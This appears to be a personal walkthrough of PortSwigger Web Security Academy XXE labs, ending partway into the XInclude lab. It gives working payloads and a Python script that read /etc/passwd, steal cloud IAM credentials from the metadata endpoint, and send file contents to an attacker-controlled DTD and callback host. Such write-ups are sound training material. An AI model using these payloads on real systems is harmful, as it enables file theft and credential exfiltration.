This lab is solved by reading /etc/passwd, and it uses a 'Check stock' function that parses XML input:
This is an apprentice lab, so this can be solved using a basic payload.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<stockCheck>
<productId>&test;</productId>
<storeId>1</storeId>
</stockCheck>
Here's the script:
import requests
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
HOST = '0a61005103bb056880e0f82900800075'
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
url = f'https://{HOST}.web-security-academy.net'
cookies = {
'session':'CyubLLWyK9XPlBRj6SewtH3DwNPR9Oeb'
}
headers = {
'Content-Type':'application/xml'
}
s = requests.Session()
xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<stockCheck>
<productId>&test;</productId>
<storeId>1</storeId>
</stockCheck>
"""
r = s.post(url + '/product/stock',data=xml, proxies=proxies, verify=False, cookies=cookies, headers=headers)
print(r.text)
Lab 2: XXE for SSRF
To solve lab, access http://169.254.169.254/ and read some sensitive information from there.
When I used the same payload as above (with the file:///etc/passwd replaced with the HTTP URL), I get this:
Appending /latest results in a different response:
Setting the URL to http://169.254.169.254/latest/meta-data/iam/security-credentials/admin solves the lab.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'http://169.254.169.254/latest/meta-data/iam/security-credentials/admin'>]>
<stockCheck>
<productId>&test;</productId>
<storeId>1</storeId>
</stockCheck>
Lab 3: Out of Band Interaction
This lab requires us send a HTTP request to a Burp Collaborator link. This is a blind XXE example.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'http://BURP.oastify.com'>]>
<stockCheck>
<productId>&test;</productId>
<storeId>1</storeId>
</stockCheck>
Lab 4: Out of Band via XML parameter entities
This lab blocks regular external entities. Trying to use ENTITY results in a block:
$ python3 lab.py
"Entities are not allowed for security reasons"
Regular external entities are custom XML entities whose defined values are loaded from outside of the DTD they are declared in. This means that for this lab, I cannot define my own entities.
As such, I can use the stockCheck entity, which is given to me. Next, I need to figure out how NOT to use custom regular external entities. PayloadAllTheThings uses this:
<!DOCTYPE root [
<!ENTITY % local_dtd SYSTEM "file:///abcxyz/">
%local_dtd;
]
Using a % changes it to a parameter entity, which can only be referenced elsewhere within the DTD (hence using stockCheck).
Thus, the payload is as such:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY % test SYSTEM 'http://vpoo93ane26oxeihvm42tgknbeh55vtk.oastify.com'> %test; ]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>
Lab 5: Blind XXE using malicious external DTD
To solve this lab, read /etc/hostname. This lab gives me an Exploit Server, as well as a Submit Feedback function.
The submit feedback function wasn't particularly interesting.
I was unable to read files using the method used in Lab 4. However, I was able to make the lab send a request to Burp Collaborator. Since I was given an Exploit Server, I can try to store a malicious DTD on it.
I want to extract the data from /etc/hostname, and then send that to Collaborator. I stored this file on the exploit server:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://BURP/?x=%file;'>">
%eval;
%exfil;
% represents a % in Unicode, and it is used to prevent syntax errors. After storing this on the exploit server, I used this payload to make the application retrieve it and process it.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % test SYSTEM 'https://EXPLOIT/evil.dtd'> %test; ]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>
This would trigger a lookup to Collaborator:
Submitting that value solves the lab.
Lab 6: Error based blind XXE
To solve this lab, use an external DTD to trigger an error message that displays /etc/passwd.
The error can be triggered by trying to read a file that does not exist.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % fail SYSTEM 'file:///idontexist/%file;'>">
%eval;
%fail;
This would append the contents of the file behind the error message.
Lab 7: Exploiting XInclude
This time, the page no longer uses client-side XML to process it:
As such, XInclude has to be used to exploit this. XInclude is part of the XML specification that allows XML docs to be built from sub-documents. All I have to do is reference the XInclude namespace.
